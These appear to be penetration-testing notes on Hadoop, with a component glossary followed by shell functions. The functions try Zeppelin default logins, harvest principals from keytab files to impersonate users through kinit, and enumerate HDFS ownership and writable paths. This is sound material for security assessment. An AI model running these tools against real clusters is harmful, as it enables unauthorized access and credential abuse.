Hadoop
Distributed storage and computing
Terminology
- Cluster, forms the data lake
- Node, single host inside the cluster
- NameNode, node that keeps the directory tree of the Hadoop file system
- DataNode, slave node that stores files and is instructed by the NameNode
- Primary NameNode, currently active node responsible for keeping the directory structure
- Secondary NameNode, checkpoints the metadata of the Primary NameNode; despite the name it is not a hot standby. In HA setups, Standby NameNodes fill that role and there may be multiple inside the cluster
- Master Node, runs Hadoop management services like the HDFS NameNode or the YARN ResourceManager
- Slave Node, runs Hadoop worker services like the HDFS DataNode or MapReduce tasks. A node can be master and slave at the same time
- Edge Node, hosts Hadoop user apps like Zeppelin or Hue
- Kerberised, cluster with security enabled through Kerberos
- HDFS, Hadoop Distributed File System, storage layer for unstructured data
- Hive, primary DB for structured data
- YARN, job scheduling and resource management
- MapReduce, distributed filtering, sorting and reducing
- Hue, GUI for HDFS and Hive
- ZooKeeper, cluster coordination
- Kafka, message broker
- Ranger, centralized ACL and authorization policies
- Zeppelin, data analytics inside a web UI
Zeppelin
- Try default logins
- Try execution inside notebooks
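The default-login check can be scripted roughly as follows. This is a minimal sketch, assuming Zeppelin's REST login endpoint at /api/login with form fields userName and password, and assuming the sample accounts from the shiro.ini template are still present. The function name, the host in the comment, and the "200 means accepted" rule are assumptions for illustration.

```shell
# Try a list of user:password pairs against Zeppelin's login endpoint.
# Assumption: the pairs below are the sample accounts from Zeppelin's
# shiro.ini template; a hardened install will have changed or removed them.
zeppelin_try_logins() {
    base_url=$1   # e.g. http://zeppelin.example:8080 (hypothetical host)
    for pair in admin:password1 user1:password2 user2:password3 user3:password4; do
        user=${pair%%:*}
        pass=${pair#*:}
        # Print only the HTTP status code of the login attempt.
        code=$(curl -s -o /dev/null -w '%{http_code}' \
            --data-urlencode "userName=$user" \
            --data-urlencode "password=$pass" \
            "$base_url/api/login")
        # Assumption: a 200 response means the login was accepted.
        if [ "$code" = "200" ]; then
            echo "valid: $user:$pass"
        fi
    done
}
```

Call it as zeppelin_try_logins <base url>. For the notebook check, a paragraph that uses the shell interpreter (for example %sh id), if that interpreter is enabled, shows which OS user the notebook code runs as.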
Ktabs
- Find ktpass files (keytabs) to authenticate at the Kerberos TGS
- Output the principals and use them with kinit
klist -k <keytabfile>
kinit -V -k -t <keytabfile> <principal name>
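The two commands above can be chained so that every principal in a found keytab is tried. This is a minimal sketch, assuming MIT Kerberos tools, where klist -k prints three header lines before the "KVNO Principal" rows. The function names and the cache file naming under /tmp are hypothetical.

```shell
# List the unique principals stored in a keytab.
# Assumes MIT `klist -k` output: three header lines, then "KVNO Principal" rows.
keytab_principals() {
    klist -k "$1" | awk 'NR > 3 { print $2 }' | sort -u
}

# Request a TGT for every principal in the keytab, each in its own
# credential cache so later tickets do not overwrite earlier ones.
# Prints "<principal> <cache file>" for every successful kinit.
kinit_all() {
    keytab=$1
    keytab_principals "$keytab" | while read -r principal; do
        # Hypothetical cache naming: principal with '/' and '@' replaced by '_'.
        cache="/tmp/krb5cc_$(printf '%s' "$principal" | tr '/@' '__')"
        if kinit -V -k -t "$keytab" -c "$cache" "$principal" < /dev/null; then
            echo "$principal $cache"
        fi
    done
}
```

To use one of the resulting tickets, point KRB5CCNAME at the printed cache file before running a Hadoop client command.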
HDFS
- Use the hdfs utility to enumerate the distributed network storage
hdfs dfs -ls /
- Current user and user on the storage do not have to correspond
- Touched files on the storage may be owned by root
hdfs dfs -touchz /tmp/testfile
hdfs dfs -ls /tmp
- Impersonate a user by initializing with that user's keytab file. NodeManager is the highest user with regard to permissions
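The ownership check and the enumeration step can be wrapped in small helpers. This is a minimal sketch, assuming the usual hdfs dfs -ls column layout (permissions, replicas, owner, group, size, date, time, path) and paths without spaces. The function names and the probe file name are hypothetical.

```shell
# Create an empty probe file and print the owner HDFS assigned to it.
# The probe name is hypothetical; pass any writable directory as $1.
hdfs_probe_owner() {
    probe="${1:-/tmp}/owner_probe_$$"
    hdfs dfs -touchz "$probe" || return 1
    # Column 3 of `hdfs dfs -ls` output is the owning user.
    hdfs dfs -ls "$probe" | awk -v p="$probe" '$NF == p { print $3 }'
    # Clean up the probe without moving it to the trash.
    hdfs dfs -rm -skipTrash "$probe" > /dev/null
}

# List entries that are writable by "other" (9th character of the mode string).
# Prints: owner, mode, path.
hdfs_world_writable() {
    hdfs dfs -ls -R "${1:-/}" 2>/dev/null |
        awk 'substr($1, 9, 1) == "w" { print $3, $1, $NF }'
}
```

Running hdfs_probe_owner /tmp before and after a kinit with another user's keytab shows which identity HDFS actually sees, independent of the local OS user.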